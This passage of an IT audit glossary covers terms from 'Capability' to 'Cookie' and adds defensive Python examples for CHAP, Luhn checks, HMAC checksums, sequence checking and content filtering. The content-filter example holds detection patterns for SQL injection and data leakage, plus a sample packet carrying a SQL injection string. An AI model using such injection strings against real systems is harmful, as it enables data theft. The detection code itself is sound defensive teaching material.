Capability  An aptitude, competency or resource that an enterprise may possess or require at an enterprise, business function or individual level that has the potential, or is required, to contribute to a business outcome and to create value
Capability Maturity Model (CMM)  1. Contains the essential elements of effective processes for one or more disciplines. It also describes an evolutionary improvement path from ad hoc, immature processes to disciplined, mature processes with improved quality and effectiveness.
2. CMM for software, from the Software Engineering Institute (SEI), is a model used by many enterprises to identify best practices useful in helping them assess and increase the maturity of their software development processes
Scope Note: CMM ranks software development enterprises according to a hierarchy of five process maturity levels. Each level ranks the development environment according to its capability of producing quality software. A set of standards is associated with each of the five levels. The standards for level one describe the most immature or chaotic processes and the standards for level five describe the most mature or quality processes.
A maturity model that indicates the degree of reliability or dependency the business can place on a process achieving the desired goals or objectives
A collection of instructions that an enterprise can follow to gain better control over its software development process
Capacity stress testing  Testing an application with large quantities of data to evaluate its performance during peak periods. Also called volume testing
Capital expenditure/expense (CAPEX)  An expenditure that is recorded as an asset because it is expected to benefit more than the current period. The asset is then depreciated or amortized over the expected useful life of the asset.
Card swipe  A physical control technique that uses a secured card or ID to gain access to a highly sensitive location.
Scope Note: If built correctly, card swipes act as a preventive control over physical access to those sensitive locations. After a card has been swiped, the application attached to the physical card swipe device logs all card users who try to access the secured location. The card swipe device prevents unauthorized access and logs all attempts to enter the secured location.
Cathode ray tube (CRT)  A vacuum tube that displays data by means of an electron beam striking the screen, which is coated with suitable phosphor material, or a device similar to a television screen on which data can be displayed
Central processing unit (CPU)  Computer hardware that houses the electronic circuits that control/direct all operations of the computer system
Centralized data processing  Identified by one central processor and databases that form a distributed processing configuration
Certificate (Certification) authority (CA)  A trusted third party that serves authentication infrastructures or enterprises and registers entities and issues them certificates
Certificate revocation list (CRL)  An instrument for checking the continued validity of the certificates for which the certification authority (CA) has responsibility
Scope Note: The CRL details digital certificates that are no longer valid. The time gap between two updates is very critical and is also a risk in digital certificate verification: a certificate revoked after the current CRL was issued is still accepted until the next CRL is published, so a relying party should honour the CRL's next-update time and treat an expired or unobtainable CRL as a verification failure rather than as an absence of revocations.
Certification practice statement (CPS)  A detailed set of rules governing the certificate authority's operations. It provides an understanding of the value and trustworthiness of certificates issued by a given certificate authority (CA).
Scope Note: In terms of the controls that an enterprise observes, the method it uses to validate the authenticity of certificate applicants and the CA's expectations of how its certificates may be used
Chain of custody  A legal principle regarding the validity and integrity of evidence. It requires accountability for anything that will be used as evidence in a legal proceeding to ensure that it can be accounted for from the time it was collected until the time it is presented in a court of law.
Scope Note: Includes documentation as to who had access to the evidence and when, as well as the ability to identify evidence as being the exact item that was recovered or tested. Lack of control over evidence can lead to it being discredited. Chain of custody depends on the ability to verify that evidence could not have been tampered with. This is accomplished by sealing off the evidence, so it cannot be changed, and providing a documentary record of custody to prove that the evidence was at all times under strict control and not subject to tampering.
Challenge/response token  A method of user authentication that is carried out through use of the Challenge Handshake Authentication Protocol (CHAP)
Scope Note: When a user tries to log in to the server using CHAP, the server sends the user a "challenge," which is a random value. The client combines the challenge with the user's secret (password), typically by hashing or encrypting the challenge under the secret, and returns the result to the server; the password itself is never sent. The server knows the secret, so it performs the same computation on the challenge it issued and compares the result with the value received from the user. If the values match, the user is authenticated. The challenge/response activity can be repeated throughout the session, and this protects the session from password sniffing and replay attacks, because the challenge value is random and changes on each access attempt. CHAP does not, however, protect against a man-in-the-middle who relays the challenge and response between the parties, and it requires the server to hold each secret in a recoverable (cleartext-equivalent) form, so the server's credential store must be protected accordingly.
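An added example, not from the glossary or from any vendor's implementation: the RFC 1994 CHAP computation (MD5 over the identifier, the secret and the challenge) with both sides written in Python. It shows that the secret never crosses the wire, that a captured response cannot be replayed against a fresh challenge, and that the server must hold the secret itself rather than a salted hash of it. The user name and secret are constructed values.

```python
import hashlib
import hmac
import os

# Constructed credential store. CHAP needs the secret itself on the server
# (not a one-way hash of it), which is why this store needs strong protection.
SERVER_SECRETS = {"alice": b"correct horse battery staple"}


def chap_response(identifier, secret, challenge):
    """RFC 1994 CHAP response value: MD5(Identifier || secret || challenge)."""
    return hashlib.md5(bytes([identifier]) + secret + challenge).digest()


class ChapServer:
    def __init__(self, secrets):
        self.secrets = secrets
        self.identifier = 0
        self.outstanding = {}   # peer name -> (identifier, challenge) awaiting a response

    def issue_challenge(self, name):
        self.identifier = (self.identifier + 1) & 0xFF   # identifier changes per challenge
        challenge = os.urandom(16)                         # fresh random value every time
        self.outstanding[name] = (self.identifier, challenge)
        return self.identifier, challenge

    def verify(self, name, identifier, response):
        pending = self.outstanding.pop(name, None)         # each challenge is usable once
        if pending is None or pending[0] != identifier or name not in self.secrets:
            return False
        expected = chap_response(identifier, self.secrets[name], pending[1])
        return hmac.compare_digest(expected, response)     # constant-time comparison


def client_answer(identifier, challenge, secret):
    """What the peer sends back; the secret itself is never transmitted."""
    return chap_response(identifier, secret, challenge)


def login(server, name, secret):
    """One complete exchange: challenge out, response back, verdict."""
    ident, chal = server.issue_challenge(name)
    return server.verify(name, ident, client_answer(ident, chal, secret))


def replay_attack(server, name, secret):
    """A sniffer captures one valid response and replays it against a later challenge."""
    ident, chal = server.issue_challenge(name)
    captured = client_answer(ident, chal, secret)
    assert server.verify(name, ident, captured)            # the legitimate login succeeds
    ident2, _chal2 = server.issue_challenge(name)
    return server.verify(name, ident2, captured)           # different challenge: fails


if __name__ == "__main__":
    srv = ChapServer(SERVER_SECRETS)
    print("correct secret :", login(srv, "alice", SERVER_SECRETS["alice"]))
    print("wrong secret   :", login(srv, "alice", b"wrong"))
    print("replayed answer:", replay_attack(srv, "alice", SERVER_SECRETS["alice"]))
```

Note what the code does not defend against: an attacker sitting between client and server can forward the challenge to the real client and the response to the real server unchanged, and an attacker who copies the SERVER_SECRETS table can answer any challenge, which is the cleartext-equivalent storage problem mentioned above.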
Change management  A holistic and proactive approach to managing the transition from a current to a desired organizational state, focusing specifically on the critical human or "soft" elements of change
Scope Note: Includes activities such as culture change (values, beliefs and attitudes), development of reward systems (measures and appropriate incentives), organizational design, stakeholder management, human resources (HR) policies and procedures, executive coaching, change leadership training, team building and communication planning and execution
Channel service unit/digital service unit (CSU/DSU)  Interfaces at the physical layer of the open systems interconnection (OSI) reference model, data terminal equipment (DTE) to data circuit-terminating equipment (DCE), for switched carrier networks
Chargeback  The redistribution of expenditures to the units within a company that gave rise to them.
Scope Note: Chargeback is important because without such a policy, misleading views may be given as to the real profitability of a product or service because certain key expenditures will be ignored or calculated according to an arbitrary formula.
Check digit  A numeric value, which has been calculated mathematically, is added to data to ensure that original data have not been altered or that an incorrect, but valid, match has occurred.
Scope Note: Check digit control is effective in detecting transposition and transcription errors.
Check digit verification (self-checking digit)  A programmed edit or routine that detects transposition and transcription errors by calculating and checking the check digit
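An added example, not from the glossary, serving both the "Check digit" and "Check digit verification" entries: the Luhn mod-10 scheme in Python, which computes a check digit, verifies a number, and demonstrates the detection limits behind the Scope Note. Single transcription errors and most adjacent transpositions are caught; the 09/90 transposition is the well-known blind spot. Sample numbers are constructed (79927398713 is the commonly used Luhn test value).

```python
def luhn_sum(digits):
    """Luhn weighted sum over a digit string; the rightmost digit carries weight 1."""
    total = 0
    for pos, ch in enumerate(reversed(digits)):
        d = int(ch)
        if pos % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:             # and reduced to a single digit (equivalent to d - 9)
                d -= 9
        total += d
    return total


def luhn_check_digit(payload):
    """Compute the digit to append to payload so that the whole number verifies."""
    # Appending '0' shifts the payload into the positions it will occupy in the final number.
    return str((10 - luhn_sum(payload + "0") % 10) % 10)


def luhn_valid(number):
    """Check digit verification: True when the number, check digit included, passes."""
    return number.isdigit() and luhn_sum(number) % 10 == 0


def transposition_detected(payload, i):
    """Swap adjacent payload digits i and i+1 and report whether verification catches it."""
    swapped = payload[:i] + payload[i + 1] + payload[i] + payload[i + 2:]
    good = payload + luhn_check_digit(payload)
    bad = swapped + luhn_check_digit(payload)     # same check digit, transposed payload
    return good != bad and not luhn_valid(bad)


if __name__ == "__main__":
    print("check digit for 7992739871:", luhn_check_digit("7992739871"))
    print("79927398713 valid:", luhn_valid("79927398713"))
    print("71 -> 17 transposition caught:", transposition_detected("7992739871", 8))
    print("09 -> 90 transposition caught:", transposition_detected("09", 0))
```

The last line prints False: 091 and 901 both verify, so a check digit is an error-detection control against careless entry, not an integrity control against deliberate change (for that, see the checksum entry below).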
Checklist  A list of items that is used to verify the completeness of a task or goal
Scope Note: Used in quality assurance (and in general, in information systems audit), to check process compliance, code standardization and error prevention, and other items for which consistency processes or standards have been defined
Checkpoint restart procedures  A point in a routine at which sufficient information can be stored to permit restarting the computation from that point
Checksum  A mathematical value that is assigned to a file and used to test the file at a later date to verify that the data contained in the file has not been maliciously changed
Scope Note: A cryptographic checksum is created by performing a series of mathematical operations (known as a cryptographic hash algorithm) that translates the data in the file into a fixed-length string of digits called a hash value, which is then used as the checksum. An unkeyed hash value detects accidental or careless modification, but anyone who can alter the file can also recompute its hash, so detecting malicious change requires either a secret key that the attacker does not hold (a keyed hash) or a copy of the hash stored or signed out of the attacker's reach. Cryptographic checksums are used in data transmission and data storage. Keyed cryptographic checksums are also known as message authentication codes (MACs), integrity check values or message integrity codes; the unkeyed form is sometimes called a modification detection code.
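An added example, not from the glossary: Python with the standard hashlib and hmac modules, contrasting an unkeyed SHA-256 checksum with an HMAC-SHA256 message authentication code when the attacker can rewrite both the file and its stored checksum. The file contents and the shared key are constructed.

```python
import hashlib
import hmac

# Constructed sample: a small "file" and the key that only sender and receiver hold.
ORIGINAL = b"amount=100;payee=ACME\n"
SECRET_KEY = b"k3y-held-by-sender-and-receiver"     # assumed shared secret


def unkeyed_checksum(data):
    """Plain hash: detects accidental change, but anyone can recompute it."""
    return hashlib.sha256(data).hexdigest()


def keyed_checksum(key, data):
    """Message authentication code (HMAC-SHA256): cannot be computed without the key."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify_keyed(key, data, tag):
    # compare_digest avoids leaking the position of the first mismatch through timing
    return hmac.compare_digest(keyed_checksum(key, data), tag)


def attacker_tampers(data, attacker_key=None):
    """Model an attacker who can rewrite both the file and the stored checksum.

    Returns (tampered_data, the checksum the attacker is able to produce).
    """
    tampered = data.replace(b"100", b"999")
    if attacker_key is None:
        return tampered, unkeyed_checksum(tampered)   # unkeyed: trivially recomputed
    return tampered, keyed_checksum(attacker_key, tampered)


def unkeyed_scenario():
    """Receiver recomputes a plain hash over the received file: the forgery passes."""
    tampered, forged = attacker_tampers(ORIGINAL)
    return unkeyed_checksum(tampered) == forged


def keyed_scenario():
    """Receiver checks an HMAC with the real key: an attacker guessing a key fails."""
    tampered, forged = attacker_tampers(ORIGINAL, attacker_key=b"guess")
    return verify_keyed(SECRET_KEY, tampered, forged)


if __name__ == "__main__":
    print("forged file accepted with unkeyed checksum:", unkeyed_scenario())
    print("forged file accepted with keyed checksum  :", keyed_scenario())
```

The same asymmetry explains why published download checksums are only useful when fetched over a channel the attacker cannot also tamper with, or when they are signed.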
Chief executive officer (CEO)  The highest ranking individual in an enterprise
Chief financial officer (CFO)  The individual primarily responsible for managing the financial risk of an enterprise
Chief information officer (CIO)  The most senior official of the enterprise who is accountable for IT advocacy, aligning IT and business strategies, and planning, resourcing and managing the delivery of IT services, information and the deployment of associated human resources
Scope Note: In some cases, the CIO role has been expanded to become the chief knowledge officer (CKO), who deals in knowledge, not just information. Also see chief technology officer (CTO).
Chief Information Security Officer (CISO)  The person in charge of information security within the enterprise
Chief Security Officer (CSO)  The person usually responsible for all security matters, both physical and digital, in an enterprise
Chief technology officer (CTO)  The individual who focuses on technical issues in an enterprise
Scope Note: Often viewed as synonymous with chief information officer (CIO)
Cipher  An algorithm to perform encryption (and the corresponding decryption)
Ciphertext  Information generated by an encryption algorithm to protect the plaintext and that is unintelligible to the unauthorized reader.
Circuit-switched network  A data transmission service requiring the establishment of a circuit-switched connection before data can be transferred from source data terminal equipment (DTE) to a sink DTE
Scope Note: A circuit-switched data transmission service uses a connection network.
Circular routing  In open systems architecture, circular routing is the logical path of a message in a communication network based on a series of gates at the physical network layer in the open systems interconnection (OSI) model.
Cleartext  Data that is not encrypted. Also known as plaintext.
Client-server  A group of computers connected by a communication network, in which the client is the requesting machine and the server is the supplying machine
Scope Note: Software is specialized at both ends. Processing may take place on either the client or the server, but it is transparent to the user.
Cloud computing  Convenient, on-demand network access to a shared pool of resources that can be rapidly provisioned and released with minimal management effort or service provider interaction
Cluster controller  A communication terminal control hardware unit that controls a number of computer terminals
Scope Note: All messages are buffered by the controller and then transmitted to the receiver.
Coaxial cable  Composed of an insulated wire that runs through the middle of each cable, a second wire that surrounds the insulation of the inner wire like a sheath, and the outer insulation which wraps the second wire
Scope Note: Has a greater transmission capacity than standard twisted-pair cables, but has a limited range of effective distance
COBIT  1. COBIT 5: Formerly known as Control Objectives for Information and related Technology (COBIT); now used only as the acronym in its fifth iteration. A complete, internationally accepted framework for governing and managing enterprise information and technology (IT) that supports enterprise executives and management in their definition and achievement of business goals and related IT goals. COBIT describes five principles and seven enablers that support enterprises in the development, implementation, and continuous improvement and monitoring of good IT-related governance and management practices
Scope Note: Earlier versions of COBIT focused on control objectives related to IT processes, management and control of IT processes and IT governance aspects. Adoption and use of the COBIT framework are supported by guidance from a growing family of supporting products. (See www.isaca.org/cobit for more information.)
2. COBIT 4.1 and earlier: Formerly known as Control Objectives for Information and related Technology (COBIT). A complete, internationally accepted process framework for IT that supports business and IT executives and management in their definition and achievement of business goals and related IT goals by providing a comprehensive IT governance, management, control and assurance model. COBIT describes IT processes and associated control objectives, management guidelines (activities, accountabilities, responsibilities and performance metrics)
CoCo  Criteria of Control, published by the Canadian Institute of Chartered Accountants in 1995
Code of ethics  A document designed to influence individual and organizational behavior of employees, by defining organizational values and the rules to be applied in certain situations.
Scope Note: A code of ethics is adopted to assist those in the enterprise called upon to make decisions understand the difference between 'right' and 'wrong' and to apply this understanding to their decisions.
COBIT 5 perspective
Coevolving  Originated as a biological term, refers to the way two or more ecologically interdependent species become intertwined over time
Scope Note: As these species adapt to their environment, they also adapt to one another. Today's multi-business companies need to take their cue from biology to survive. They should assume that links among businesses are temporary and that the number of connections, not just their content, matters. Rather than plan collaborative strategy from the top, as traditional companies do, corporate executives in coevolving companies should simply set the context and let collaboration (and competition) emerge from business units.
Coherence  Establishing a potent binding force and sense of direction and purpose for the enterprise, relating different parts of the enterprise to each other and to the whole to act as a seemingly unique entity
Cohesion  The extent to which a system unit (subroutine, program, module, component, subsystem) performs a single dedicated function.
Scope Note: Generally, the more cohesive the unit, the easier it is to maintain and enhance a system because it is easier to determine where and how to apply a change.
Cold site  An IS backup facility that has the necessary electrical and physical components of a computer facility, but does not have the computer equipment in place
Scope Note: The site is ready to receive the necessary replacement computer equipment in the event that the users have to move from their main computing location to the alternative computer facility.
Collision  The situation that occurs when two or more demands are made simultaneously on equipment that can handle only one at any given instant (Federal Standard 1037C)
Combined Code on Corporate Governance  The consolidation in 1998 of the "Cadbury," "Greenbury" and "Hampel" Reports
Scope Note: Named after the Committee Chairs, these reports were sponsored by the UK Financial Reporting Council, the London Stock Exchange, the Confederation of British Industry, the Institute of Directors, the Consultative Committee of Accountancy Bodies, the National Association of Pension Funds and the Association of British Insurers to address the financial aspects of corporate governance, directors' remuneration and the implementation of the Cadbury and Greenbury recommendations.
Common Attack Pattern Enumeration and Classification (CAPEC)  A catalogue of attack patterns as an abstraction mechanism for helping describe how an attack against vulnerable systems or networks is executed, published by the MITRE Corporation
Communication processor  A computer embedded in a communications system that generally performs the basic tasks of classifying network traffic and enforcing network policy functions
Scope Note: An example is the message data processor of a defense digital network (DDN) switching center. More advanced communication processors may perform additional functions.
Communications controller  Small computers used to connect and coordinate communication links between distributed or remote devices and the main computer, thus freeing the main computer from this overhead function
Community strings  Authenticate access to management information base (MIB) objects and function as embedded passwords
Scope Note: Examples are:
- Read-only (RO): Gives read access to all objects in the MIB except the community strings, but does not allow write access
- Read-write (RW): Gives read and write access to all objects in the MIB, but does not allow access to the community strings
- Read-write-all: Gives read and write access to all objects in the MIB, including the community strings (only valid for Catalyst 4000, 5000 and 6000 series switches)
Simple Network Management Protocol (SNMP) community strings are sent across the network in cleartext (in SNMP versions 1 and 2c; SNMPv3 replaces them with per-user authentication and optional encryption). A common way to protect an operating system (OS) software-based device from unauthorized SNMP management is to build a standard IP access list that includes the source address of the management station(s). Multiple access lists can be defined and tied to different community strings. If logging is enabled on the access list, then log messages are generated every time that the device is accessed from the management station. The log message records the source IP address of the packet.
Comparison program  A program for the examination of data, using logical or conditional tests to determine or to identify similarities or differences
Compartmentalization  A process for protecting very high value assets or in environments where trust is an issue. Access to an asset requires two or more processes, controls or individuals.
Compensating control  An internal control that reduces the risk of an existing or potential control weakness resulting in errors and omissions
Competence  The ability to perform a specific task, action or function successfully
Scope Note: COBIT 5 perspective
Competencies  The strengths of an enterprise or what it does well
Scope Note: Can refer to the knowledge, skills and abilities of the assurance team or individuals conducting the work.
Compiler  A program that translates programming language (source code) into machine executable instructions (object code)
Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA)  A type of challenge-response test used in computing to ensure that the response is not generated by a computer. An example is the site request for website users to recognize and type a phrase posted using various challenging-to-read fonts.
Completely connected (mesh) configuration  A network topology in which devices are connected with many redundant interconnections between network nodes (primarily used for backbone networks)
Completeness check  A procedure designed to ensure that no fields are missing from a record
Compliance  Adherence to, and the ability to demonstrate adherence to, mandated requirements defined by laws and regulations, as well as voluntary requirements resulting from contractual obligations and internal policies
Compliance documents  Policies, standards and procedures that document the actions that are required or prohibited. Violations may be subject to disciplinary actions.
Compliance testing  Tests of control designed to obtain audit evidence on both the effectiveness of the controls and their operation during the audit period
Component  A general term that is used to mean one part of something more complex
Scope Note: For example, a computer system may be a component of an IT service, or an application may be a component of a release unit. Components are cooperating packages of executable software that make their services available through defined interfaces. Components used in developing systems may be commercial off-the-shelf software (COTS) or may be purposely built. However, the goal of component-based development is to ultimately use as many pre-developed, pre-tested components as possible.
Comprehensive audit  An audit designed to determine the accuracy of financial records as well as to evaluate the internal controls of a function or department
Computationally greedy  Requiring a great deal of computing power; processor intensive
Computer emergency response team (CERT)  A group of people integrated at the enterprise with clear lines of reporting and responsibilities for standby support in case of an information systems emergency. This group will act as an efficient corrective control, and should also act as a single point of contact for all incidents and issues related to information systems.
Computer forensics: The application of the scientific method to digital media to establish factual information for judicial review
Scope Note: This process often involves investigating computer systems to determine whether they are or have been used for illegal or unauthorized activities. As a discipline, it combines elements of law and computer science to collect and analyze data from information systems (e.g., personal computers, networks, wireless communication and digital storage devices) in a way that is admissible as evidence in a court of law.
Computer sequence checking: Verifies that the control number follows sequentially and that any control numbers out of sequence are rejected or noted on an exception report for further research
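The two input controls defined above (completeness check and computer sequence checking) as one working batch validator. This is an added example, not text or code from the ISACA glossary; the record layout, the REQUIRED_FIELDS list and the sample batch are constructed for illustration.

```python
"""Two input controls over a batch of constructed records: a completeness check
(no required field missing) and a computer sequence check (control numbers must
be consecutive; anything out of sequence is rejected or noted on an exception
report). Added example, not part of the ISACA glossary."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Assumed record layout: every batch record must carry these fields.
REQUIRED_FIELDS: Tuple[str, ...] = ("control_no", "account", "amount", "date")


@dataclass
class ControlResult:
    accepted: List[Dict] = field(default_factory=list)
    rejected: List[Dict] = field(default_factory=list)
    exceptions: List[str] = field(default_factory=list)  # the exception report


def completeness_check(record: Dict, required=REQUIRED_FIELDS) -> List[str]:
    """Return the names of required fields that are missing or empty."""
    return [f for f in required if record.get(f) in (None, "")]


def sequence_check(records: List[Dict], start: int,
                   reject_out_of_sequence: bool = True) -> ControlResult:
    """Run the completeness check, then verify control numbers are consecutive.

    Incomplete records are always rejected. An out-of-sequence control number is
    rejected (the expected number stays outstanding) or, if the site prefers to
    keep processing, accepted and noted on the exception report for research.
    """
    result = ControlResult()
    expected = start
    for rec in records:
        missing = completeness_check(rec)
        if missing:
            result.rejected.append(rec)
            result.exceptions.append(
                f"record {rec.get('control_no')}: incomplete, missing {missing}")
            continue
        n = rec["control_no"]
        if n != expected:
            note = f"control number {n} out of sequence (expected {expected})"
            if reject_out_of_sequence:
                result.rejected.append(rec)
                result.exceptions.append(note + ": rejected")
                continue
            result.exceptions.append(note + ": accepted, noted for research")
        result.accepted.append(rec)
        expected = n + 1
    return result


# Constructed batch: a gap (1003 arrives late), an incomplete record (1005) and a
# number that jumps ahead (1006).
SAMPLE_BATCH = [
    {"control_no": 1001, "account": "A-17", "amount": "120.00", "date": "2014-03-02"},
    {"control_no": 1002, "account": "A-22", "amount": "75.50", "date": "2014-03-02"},
    {"control_no": 1004, "account": "A-09", "amount": "9.99", "date": "2014-03-02"},
    {"control_no": 1003, "account": "A-31", "amount": "310.00", "date": "2014-03-02"},
    {"control_no": 1005, "account": "A-05", "amount": "", "date": "2014-03-02"},
    {"control_no": 1006, "account": "A-44", "amount": "42.00", "date": "2014-03-02"},
]


def accepted_numbers(result: ControlResult) -> List[int]:
    return [r["control_no"] for r in result.accepted]


if __name__ == "__main__":
    strict = sequence_check(SAMPLE_BATCH, start=1001)
    print("accepted:", accepted_numbers(strict))
    print("\n".join(strict.exceptions))
```

In strict mode the late-arriving 1003 is accepted once it appears because the expected number was left outstanding when 1004 was rejected; in the lenient mode every out-of-sequence number is processed but lands on the exception report, which is the behaviour the definition describes as "noted for further research".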
Computer server: 1. A computer dedicated to servicing requests for resources from other computers on a network. Servers typically run network operating systems. 2. A computer that provides services to another computer (the client)
Computer-aided software engineering (CASE): The use of software packages that aid in the development of all phases of an information system
Scope Note: System analysis, design, programming and documentation are provided. Changes introduced in one CASE chart will update all other related charts automatically. CASE can be installed on a microcomputer for easy access.
Computer-assisted audit technique (CAAT): Any automated audit technique, such as generalized audit software (GAS), test data generators, computerized audit programs and specialized audit utilities
Concurrency control: Refers to a class of controls used in a database management system (DBMS) to ensure that transactions are processed in an atomic, consistent, isolated and durable manner (ACID). This implies that only serializable and recoverable schedules are permitted, and that committed transactions are not discarded when undoing aborted transactions.
Concurrent access: A failover process in which all nodes run the same resource group (there can be no [Internet Protocol] IP or [media access control] MAC address in a concurrent resource group) and access the external storage concurrently
Confidentiality: Preserving authorized restrictions on access and disclosure, including means for protecting privacy and proprietary information
Configurable control: Typically, an automated control that is based on, and therefore dependent on, the configuration of parameters within the application system
Configuration item (CI): Component of an infrastructure, or an item such as a request for change associated with an infrastructure, which is (or is to be) under the control of configuration management
Scope Note: May vary widely in complexity, size and type, from an entire system (including all hardware, software and documentation) to a single module or a minor hardware component
Configuration management: The control of changes to a set of configuration items over a system life cycle
Console log: An automated detail report of computer system activity
Consulted: In a RACI (responsible, accountable, consulted, informed) chart, refers to those people whose opinions are sought on an activity (two-way communication)
Consumerization: A new model in which emerging technologies are first embraced by the consumer market and later spread to the business
Containment: Actions taken to limit exposure after an incident has been identified and confirmed
Content filtering: Controlling access to a network by analyzing the contents of the incoming and outgoing packets and either letting them pass or denying them based on a list of rules
Scope Note: Differs from packet filtering in that it is the data in the packet that are analyzed instead of the attributes of the packet itself (e.g., source/target IP address, transmission control protocol [TCP] flags)
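The distinction the Scope Note draws, shown as code: a packet filter that decides on header attributes only, and a content filter that inspects the payload, run over a few constructed packets. This is an added example, not from the ISACA glossary; the rule tables, the patterns and the packet records are constructed, and a real inspection engine would reassemble TCP streams and decode protocols before matching.

```python
"""Packet filtering versus content filtering on constructed packets.
Added example, not from the ISACA glossary."""
import ipaddress
import re
from typing import Dict, Tuple

# --- packet filter: decisions from header attributes only --------------------
# (action, source network, destination port or None, required TCP flags or None)
PACKET_RULES = [
    ("deny",  "10.0.0.0/8", 23,   None),       # no telnet from the internal net
    ("allow", "0.0.0.0/0",  80,   None),
    ("allow", "0.0.0.0/0",  443,  None),
    ("allow", "10.0.0.0/8", None, {"ACK"}),    # established traffic from inside
]
DEFAULT_ACTION = "deny"   # default-deny: anything unmatched is dropped


def packet_filter(pkt: Dict) -> Tuple[str, str]:
    """First matching rule wins; otherwise the default action applies."""
    src = ipaddress.ip_address(pkt["src"])
    for action, net, port, flags in PACKET_RULES:
        if src not in ipaddress.ip_network(net):
            continue
        if port is not None and pkt["dport"] != port:
            continue
        if flags is not None and not flags <= set(pkt.get("flags", ())):
            continue
        return action, f"rule {net} port={port} flags={flags}"
    return DEFAULT_ACTION, "default"


# --- content filter: decisions from the payload bytes ------------------------
CONTENT_RULES = [
    ("sqli",   re.compile(rb"(?i)\bunion\s+select\b|'\s*or\s+1\s*=\s*1")),
    ("xss",    re.compile(rb"(?i)<script\b")),
    ("exe",    re.compile(rb"^MZ")),                       # Windows executable header
    ("secret", re.compile(rb"\b\d{3}-\d{2}-\d{4}\b")),     # SSN-like string leaving the net
]


def content_filter(pkt: Dict) -> Tuple[str, str]:
    payload = pkt.get("payload", b"")
    for name, pattern in CONTENT_RULES:
        if pattern.search(payload):
            return "deny", f"content:{name}"
    return "allow", "content:clean"


def inspect(pkt: Dict) -> Tuple[str, str]:
    """Cheap header checks first; payload inspection only for what they let through."""
    action, why = packet_filter(pkt)
    if action != "allow":
        return action, why
    return content_filter(pkt)


# Constructed traffic
SAMPLE_PACKETS = [
    {"id": 1, "src": "198.51.100.7", "dport": 80,   "flags": ["SYN"],
     "payload": b"GET /index.html HTTP/1.1\r\n"},
    {"id": 2, "src": "198.51.100.7", "dport": 80,   "flags": ["ACK"],
     "payload": b"GET /item?id=1 UNION SELECT password FROM users HTTP/1.1\r\n"},
    {"id": 3, "src": "10.1.2.3",     "dport": 23,   "flags": ["SYN"], "payload": b""},
    {"id": 4, "src": "10.1.2.3",     "dport": 5555, "flags": ["ACK"],
     "payload": b"name=Bob ssn=123-45-6789"},
    {"id": 5, "src": "203.0.113.9",  "dport": 8080, "flags": ["SYN"],
     "payload": b"GET / HTTP/1.1\r\n"},
]


def run(packets=SAMPLE_PACKETS) -> Dict[int, Tuple[str, str]]:
    return {p["id"]: inspect(p) for p in packets}


if __name__ == "__main__":
    for pid, (action, why) in run().items():
        print(f"packet {pid}: {action:5} ({why})")
```

Packets 2 and 4 are the ones that matter: both pass the attribute-based rules (port 80 from outside, established traffic from inside) and are stopped only because their data were inspected.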
Context: The overall set of internal and external factors that might influence or determine how an enterprise, entity, process or individual acts
Scope Note: Context includes:
technology context (technological factors that affect an enterprise's ability to extract value from data)
data context (data accuracy, availability, currency and quality)
skills and knowledge (general experience and analytical, technical and business skills)
organizational and cultural context (political factors and whether the enterprise prefers data to intuition)
strategic context (strategic objectives of the enterprise)
COBIT 5 perspective
Contingency plan: A plan used by an enterprise or business unit to respond to a specific systems failure or disruption
Contingency planning: Process of developing advance arrangements and procedures that enable an enterprise to respond to an event that could occur by chance or unforeseen circumstances.
Continuity: Preventing, mitigating and recovering from disruption
Scope Note: The terms "business resumption planning," "disaster recovery planning" and "contingency planning" also may be used in this context; they all concentrate on the recovery aspects of continuity.
Continuous auditing approach: This approach allows IS auditors to monitor system reliability on a continuous basis and to gather selective audit evidence through the computer.
Continuous availability: Nonstop service, with no lapse in service; the highest level of service in which no downtime is allowed
Continuous improvement: The goals of continuous improvement (Kaizen) include the elimination of waste, defined as "activities that add cost but do not add value;" just-in-time (JIT) delivery; production load leveling of amounts and types; standardized work; paced moving lines; and right-sized equipment
Scope Note: A closer definition of the Japanese usage of Kaizen is "to take it apart and put it back together in a better way." What is taken apart is usually a process, system, product or service. Kaizen is a daily activity whose purpose goes beyond improvement. It is also a process that, when done correctly, humanizes the workplace, eliminates hard work (both mental and physical), and teaches people how to do rapid experiments using the scientific method and how to learn to see and eliminate waste in business processes.
Control: The means of managing risk, including policies, procedures, guidelines, practices or organizational structures, which can be of an administrative, technical, management, or legal nature.
Scope Note: Also used as a synonym for safeguard or countermeasure.
See also Internal control.
Control center: Hosts the recovery meetings where disaster recovery operations are managed
Control framework: A set of fundamental controls that facilitates the discharge of business process owner responsibilities to prevent financial or information loss in an enterprise
Control group: Members of the operations area who are responsible for the collection, logging and submission of input for the various user groups
Control objective: A statement of the desired result or purpose to be achieved by implementing control procedures in a particular process
Control Objectives for Enterprise Governance: A discussion document that sets out an "enterprise governance model" focusing strongly on both the enterprise business goals and the information technology enablers that facilitate good enterprise governance, published by the Information Systems Audit and Control Foundation in 1999.
Control perimeter: The boundary defining the scope of control authority for an entity
Scope Note: For example, if a system is within the control perimeter, the right and ability exist to control it in response to an attack.
Control practice: Key control mechanism that supports the achievement of control objectives through responsible use of resources, appropriate management of risk and alignment of IT with business
Control risk: The risk that a material error exists that would not be prevented or detected on a timely basis by the system of internal controls (See Inherent risk)
Control risk self-assessment: A method/process by which management and staff of all levels collectively identify and evaluate risk and controls within their business areas. This may be under the guidance of a facilitator such as an auditor or risk manager.
Control section: The area of the central processing unit (CPU) that executes software, allocates internal memory and transfers operations between the arithmetic-logic, internal storage and output sections of the computer
Control weakness: A deficiency in the design or operation of a control procedure. Control weaknesses can potentially result in risk relevant to the area of activity not being reduced to an acceptable level (relevant risk threatens achievement of the objectives relevant to the area of activity being examined). Control weaknesses can be material when the design or operation of one or more control procedures does not reduce to a relatively low level the risk that misstatements caused by illegal acts or irregularities may occur and not be detected by the related control procedures.
Cookie: A message kept in the web browser for the purpose of identifying users and possibly preparing customized web pages for them
Scope Note: The first time a cookie is set, a user may be required to go through a registration process. Subsequent to this, whenever the cookie's message is sent to the server, a customized view based on that user's preferences can be produced. The browser's implementation of cookies has, however, brought several security concerns, allowing breaches of security and the theft of personal information (e.g., user passwords that validate the user identity and enable restricted web services).
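The security concerns in the Scope Note are addressed in practice by the attributes a server puts on the Set-Cookie header. The following is an added example, not from the ISACA glossary: it parses constructed Set-Cookie headers, reports the missing protections (Secure, HttpOnly, SameSite) and rewrites a weak header into a hardened one. The cookie name "sessionid" is an assumption.

```python
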